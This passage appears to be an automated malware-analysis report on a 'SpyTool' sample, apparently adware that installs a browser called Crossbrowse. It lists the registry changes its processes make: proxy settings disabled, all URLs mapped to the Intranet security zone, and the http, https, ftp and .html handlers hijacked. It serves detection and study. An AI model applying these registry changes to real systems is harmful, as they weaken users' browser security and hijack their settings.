The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsa19.tmp:648 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr21.tmp\Registry.dll,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 7E 5D CA 4C 70 B6 9B 9C 41 F9 49 07 58 43 CB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following registry key(s):

[HKCU\Software\InternetTurbo]

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsa19.tmp:364 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 47 E1 1C 38 ED 38 31 88 6C E9 2D C3 31 74 5E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\Registry.dll,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"

The process gmsd_re_005010077.exe:1880 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 71 BE D7 DE 91 3B 0A 98 FF F6 BE 60 D7 77 A4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process nsq3D.tmp:240 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 71 E5 FD 5E 38 4A 2D 8C 18 DE 16 3D 9B 3A D9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process fsd34.exe:1368 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 E1 16 2B 09 C0 03 BB 4E 01 A7 4D 56 29 91 BF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Crossbrowse\Crossbrowse\Application]
"crossbrowse.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9227"
"SHELL32.dll,-8964"
"SHELL32.dll,-9319"
"SHELL32.dll,-9217"
"SHELL32.dll,-9216"

The process nsm32.tmp:444 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 BE 0C B4 92 71 37 4E 6B A7 12 15 62 F1 A8 35"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process setup.exe:564 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"VersionMajor" = "2171"
"NoRepair" = "1"

[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr21.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr21.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2A.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2A.tmp\, , \??\%Program Files%\Crossbrowse\Crossbrowse,"

[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"

[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\InstallInfo]
"HideIconsCommand" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --hide-icons"
"ReinstallCommand" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --make-default-browser"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities]
"ApplicationDescription" = "Crossbrowse is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Crossbrowse."

[HKLM\SOFTWARE\Crossbrowse\Installer]
"UninstallArguments" = " --uninstall --system-level"

[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerExtraCode1" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"

[HKCR\.html]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp]
"URL Protocol" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\InstallInfo]
"IconsVisible" = "1"

[HKLM\SOFTWARE\Crossbrowse\Installer]
"oopcrashes" = "1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities]
"ApplicationName" = "Crossbrowse"

[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerError" = "0"

[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities]
"ApplicationIcon" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"DisplayVersion" = "39.6.2171.95"

[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"

[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""

[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\delegate_execute.exe"

[HKLM\SOFTWARE\Crossbrowse\Installer]
"ap" = "-stage:preconditions"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"InstallLocation" = "%Program Files%\Crossbrowse\Crossbrowse\Application"

[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"

[HKCR\https\shell]
"(Default)" = "open"

[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"

[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""

[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"

[HKCR\ftp]
"URL Protocol" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Crossbrowse\Installer]
"UninstallString" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe"

[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""

[HKCR\https\shell\open\ddeexec]
"(Default)" = ""

[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"DisplayName" = "Crossbrowse"
"UninstallString" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe --uninstall --system-level"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"Version" = "39.6.2171.95"

[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"

[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"

[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKCU\Software\Classes\https\shell]
"(Default)" = "open"

[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\Startmenu]
"StartMenuInternet" = "Crossbrowse"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"
"irc" = "CRSBRWSHTML"

[HKCU\Software\Classes\http\shell]
"(Default)" = "open"

[HKCR\HTTP\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"Publisher" = "The Crossbrowse Authors"

[HKCU\Software\Classes\http]
"URL Protocol" = ""

[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\https]
"URL Protocol" = ""

[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D D1 4B E0 19 3A 2A 3F 50 4F 0D A3 F9 E5 63 71"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
